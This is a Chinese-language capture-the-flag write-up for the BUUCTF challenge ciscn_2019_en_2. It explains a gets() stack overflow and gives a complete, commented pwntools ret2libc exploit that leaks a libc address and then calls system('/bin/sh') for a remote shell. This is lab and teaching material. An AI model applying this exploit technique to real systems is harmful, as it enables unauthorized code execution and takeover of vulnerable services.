buuctf ciscn_2019_en_2(栈溢出、ret2libc)
gets 函数明显存在栈溢出(无长度限制地读入栈上缓冲区),而且程序里没有后门函数,所以可以想到 ret2libc:先借 puts 泄露 libc 中 puts 的真实地址,算出 libc 基址后再返回到 system("/bin/sh")。
先获取重要地址:溢出到返回地址所需的填充长度(0x50+8)、main 的地址(泄露后再次回到程序入口)、`pop rdi; ret` gadget,以及一个单独的 `ret` gadget(第二阶段调用 system 前用来做栈对齐)。
exp如下
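from pwn import *
from LibcSearcher import LibcSearcher

"""ret2libc exploit for ciscn_2019_en_2 (BUUCTF).

Stage 1 overflows the gets() buffer to call puts(puts@got) and leaks the
runtime address of puts; stage 2 reuses the same overflow to call
system("/bin/sh") with addresses derived from the leaked libc base.

Run with `python3 exp.py LOCAL` to target the local binary; without the
flag the remote BUUCTF instance is used (pwnlib's `args` parses the flag).
"""

context(arch='amd64', os='linux', log_level='debug')
elf = ELF('./ciscn_2019_en_2')
io = process('./ciscn_2019_en_2') if args.LOCAL else remote('node5.buuoj.cn', 27128)

# The overflowing buffer sits 0x50 bytes below the saved rbp, so 0x50 bytes of
# filler plus 8 bytes for rbp reach the saved return address.
padding = 0x50 + 8
# Fixed addresses from the non-PIE binary: main, a `pop rdi; ret` gadget and a
# lone `ret` (found with a gadget finder such as ROPgadget).
# NOTE(review): main could also come from elf.symbols['main'] if the binary
# keeps its symbol table — verify before swapping.
main_addr = 0x400b28
pop_rdi_addr = 0x00400c83
ret_addr = 0x004006b9

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']


def send_plaintext(payload: bytes) -> None:
    """Pick menu option 1 and feed *payload* to the vulnerable gets() call."""
    io.sendlineafter(b'Input your choice!', b'1')
    io.sendlineafter(b'Input your Plaintext to be encrypted', payload)


# ---- stage 1: leak puts@libc -------------------------------------------------
# The filler content is irrelevant (it only has to reach the return address),
# so it does not matter if the program transforms it before echoing it back.
# Chain: pop rdi <- puts@got ; call puts@plt ; return to main for a second overflow.
payload1 = padding * b'a' + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
send_plaintext(payload1)

# puts prints the 6 significant bytes of the address; a user-space libc address
# on x86-64 ends (little-endian) with 0x7f, so read up to that byte and
# zero-extend to 8 bytes.
puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success(f'puts @ {hex(puts_addr)}')

# ---- stage 2: derive libc base and call system("/bin/sh") --------------------
libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
# A genuine libc base is page-aligned; a misaligned value means LibcSearcher
# matched the wrong libc build. Stop here instead of firing a chain that will
# only crash the target — choose another candidate and rerun.
if libcbase & 0xfff:
    log.error(f'libc base {hex(libcbase)} is not page-aligned: wrong libc candidate?')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
log.info(f'libc base @ {hex(libcbase)}')

# The leading lone `ret` keeps rsp 16-byte aligned when system() runs; without
# it system() can fault on an SSE (movaps) instruction in some libc builds.
payload2 = padding * b'a' + p64(ret_addr) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
send_plaintext(payload2)
io.interactive()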
运行
LibcSearcher 会列出多个候选 libc 版本,这里选择第 0 个。若选错版本,算出的 libc 基址通常不再页对齐(低 12 位非 0)或最终拿不到 shell,此时应换其他候选重试。
可以得到结果